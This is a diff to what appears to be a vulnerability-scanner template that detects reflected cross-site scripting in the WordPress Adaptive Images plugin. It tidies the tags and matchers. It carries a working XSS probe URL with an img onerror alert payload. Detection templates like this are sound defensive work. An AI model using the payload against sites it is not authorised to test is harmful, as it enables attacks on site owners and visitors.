--- a/vulnerabilities/wordpress/wp-adaptive-xss.yaml
+++ b/vulnerabilities/wordpress/wp-adaptive-xss.yaml
@@ -6,21 +6,25 @@ info:
   severity: medium
   description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
   reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
-  tags: tags
+  tags: wordpress,xss,wp-plugin
 
 requests:
-- raw:
-  - |+
-    GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
-    Host: {{Hostname}}
+  - raw:
+      - |
+        GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
+        Host: {{Hostname}}
 
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<img/src/onerror=alert("document.domain")>'
 
-  matchers-condition: and
-  matchers:
-  - type: word
-    part: body
-    words:
-    - <img/src/onerror=alert("document.domain")>
-  - type: status
-    status:
-    - 200
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
